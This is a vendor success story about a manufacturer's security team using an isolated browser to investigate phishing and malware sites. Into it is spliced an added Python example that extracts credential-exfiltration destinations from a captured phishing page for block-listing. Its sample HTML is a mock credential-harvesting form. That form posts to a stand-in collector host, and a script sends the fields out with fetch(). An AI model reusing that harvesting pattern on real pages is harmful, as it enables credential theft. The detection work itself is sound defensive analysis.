American equipment manufacturer relies on Silo for Research to analyze threats

A Fortune 100 machinery manufacturer doesn’t take any chances with malware and phishing threats. The company’s detection and mitigation team responds to system alerts and phishing exposure reports, and uses Silo for Research to identify and analyze potential threats, plus coordinate appropriate actions and communications to mitigate risk.
Equipment manufacturer success story

DIY “dirty” network not sufficient for SOC, advanced threat hunting

Our customer is among the world’s largest manufacturers of equipment and heavy machinery, serving clients on every continent. The company’s security team relies on an integrated set of tools to trigger alerts when suspected malware enters the network, followed by a coordinated effort of a dedicated team of threat hunters to determine the nature of the threat, its origins and appropriate mitigation strategies.

When the SOC detection and mitigation team receives a warning that someone might have accidentally downloaded a suspicious file or been exposed to a phishing email, they start by running automated tests against the suspicious site’s elements and services. The results may help explain where the malware came from and how it was executed, but the scanner information alone is not sufficient to determine the true intentions of the site’s owners.

To dig deeper, security analysts would use a homegrown “dirty” network to access the site and look around. And while a dedicated connection provided a barrier between the investigators’ activities and the corporate network, the DIY “dirty” network didn’t have the features needed to conduct a thorough examination and required continuous monitoring and maintenance.

What’s more, once the company switched to remote work during the COVID-19 pandemic, investigators lost their dedicated connection, halting their ability to follow up on threats beyond initial analysis and making it outright dangerous to investigate malicious sites for fear of introducing malware to the company’s core network.


Silo For Research fits into SOC workflow, provides actionable results

Silo for Research provides a platform for isolated browsing, accessible from anywhere, without the need for a “dirty” network. The detection and mitigation team has incorporated the use of Silo for Research into their daily workflow, relying on its many features, such as screenshot capture and shared storage, to research threats and recommend preventative measures.

The solution allows investigators to interact with all types of content safely in the cloud, protecting the company’s assets and keeping researchers’ actions secure and anonymous. With Silo for Research, investigators can safely dig deep inside any site to look for hidden features, such as redirects to other locations.

Analysts appear as in-region visitors to avoid geo-blocking

As a global company, the manufacturer needs to be able to research threats that originate in different parts of the world. Silo for Research offers a full array of translation features, as well as the ability for investigators to customize their location, time zone and keyboard settings, to appear to be connecting from anywhere in the world. The company’s detection and mitigation team used Silo’s different egress nodes to investigate threats that are designed to target certain geographies — like the Russian-origin malware specifically aimed at the users in the U.K. Silo also proved valuable when performing penetration testing to evaluate the security of the company’s own web-based systems around the world.


Storage, capture and dev tools built for the job

When the automated ticketing system receives an alert of potential phishing exposure and flags it for further investigation, the detection and mitigation team immediately opens the suspicious site within Silo for Research and uses developer tools to look into the HTML code that’s responsible for credential harvesting.

The goal is to find where the stolen information is going, so they can update the list of blocked sites to prevent them from launching phishing campaigns in the future.
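The two paragraphs above describe the analyst's workflow: open the phishing page in the isolated browser, inspect the HTML, and find where submitted credentials go so the destination can be added to the block list. The following is an added example of that inspection step in code; it is not code from Authentic8 or from the manufacturer. It assumes the analyst has already saved the page's HTML from the isolated session, and the sample page, its hostnames (all under the reserved `.invalid` TLD) and the function names are constructed for illustration. It goes slightly beyond the text by also catching JavaScript-side exfiltration (`fetch`, `XMLHttpRequest.open`, `sendBeacon` calls), since a form's `action` is not the only place credentials can be sent.

```python
"""Extract credential-harvesting destinations from a captured phishing page.

Added example, not the customer's or Authentic8's code. Assumes the page HTML
was saved from the isolated browser session; the sample below is constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a login form posting to a third-party host, a harmless
# search form, and a script that also ships the fields with fetch().
SAMPLE_PAGE_URL = "https://login-example.invalid/auth/index.html"
SAMPLE_HTML = """
<html><body>
<form id="login" method="post" action="//collector.example.invalid/drop.php">
  <input type="email" name="user">
  <input type="password" name="pass">
  <input type="hidden" name="campaign" value="q3">
  <button type="submit">Sign in</button>
</form>
<form action="/search" method="get"><input name="q"></form>
<script>
  document.getElementById("login").addEventListener("submit", function () {
    fetch("https://backup-collector.example.invalid/api/in", {method: "POST"});
  });
</script>
</body></html>
"""


class CredentialFormParser(HTMLParser):
    """Collect <form> elements, note which contain a password field, and keep
    inline <script> text for a second pass."""

    def __init__(self):
        super().__init__()
        self.forms = []            # [{"action": str, "has_password": bool}, ...]
        self.script_text = []      # bodies of inline <script> blocks
        self._current = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["has_password"] = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)


# Absolute URLs passed as the first argument of common exfiltration calls.
URL_IN_SCRIPT = re.compile(r"""(?:fetch|open|sendBeacon)\(\s*["'](https?://[^"']+)["']""")


def exfil_destinations(html, page_url):
    """Return the set of hosts that would receive submitted credentials."""
    parser = CredentialFormParser()
    parser.feed(html)
    hosts = set()
    for form in parser.forms:
        if not form["has_password"]:
            continue                      # ignore forms that take no secret
        # An empty action submits back to the page itself; relative and
        # scheme-relative actions are resolved against the page URL.
        target = urljoin(page_url, form["action"] or page_url)
        hosts.add(urlsplit(target).hostname)
    for script in parser.script_text:
        for url in URL_IN_SCRIPT.findall(script):
            hosts.add(urlsplit(url).hostname)
    return {h for h in hosts if h}


def block_candidates(html, page_url):
    """Destinations other than the page's own host: what goes on the block list
    alongside the phishing URL itself."""
    own = urlsplit(page_url).hostname
    return sorted(h for h in exfil_destinations(html, page_url) if h != own)


if __name__ == "__main__":
    for host in block_candidates(SAMPLE_HTML, SAMPLE_PAGE_URL):
        print(host)
```

The phishing page's own host is excluded from the candidates only because it is already known from the ticket; in practice both it and the collector hosts are blocked. The script regex is a heuristic for inline code and will miss obfuscated or externally loaded JavaScript, which is where the manual developer-tools review described above still matters.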

Similarly, when investigating malware reports, researchers can access malicious sites within Silo for Research and safely download suspicious files, even if they have already been deleted from the machine of a user who stumbled upon that malware first.

All evidence and other items of interest are documented as screenshots and attached to the service ticket, which is subsequently reviewed by the team of intelligence analysts, who determine which URLs must be blocked to keep the company’s networks safe.
